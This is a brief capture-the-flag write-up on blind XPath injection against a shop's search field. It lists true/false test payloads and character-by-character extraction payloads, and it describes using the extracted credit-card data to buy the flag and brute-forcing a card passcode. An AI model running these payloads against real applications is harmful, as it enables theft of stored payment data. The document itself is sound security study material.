The search field was vulnerable to blind XPath injection: the response differs depending on whether an injected predicate is true or false, so data can be extracted one boolean answer at a time.

Confirming the syntax with one always-true and one always-false predicate (the trailing /true and /false are annotations, not part of the payload; the payloads are left open because the application's own query presumably supplies the closing `")]`, and the union `| /*[...]` adds the document root to the result set only when the predicate holds):
```
")] | /* [("a"="a /true
")] | /* [("a"="b /false
```

Extracting data, one character of the root element name at a time (XPath `substring()` is 1-indexed, and string comparison is case-sensitive):
```
")] | /* [(substring(name(/*[1]),1,1)="s
")] | /* [(substring(name(/*[1]),2,1)="h
")] | /* [(substring(name(/*[1]),3,1)="o
")] | /* [(substring(name(/*[1]),4,1)="p
```

The root element (the "database" name) comes out as shop. Continue the same way until all the credit-card information is extracted, buy the flag with it, and finally brute-force the passcode of the VISA card.

**For more information: [https://twitter.com/YShahinzadeh/](https://twitter.com/YShahinzadeh/)**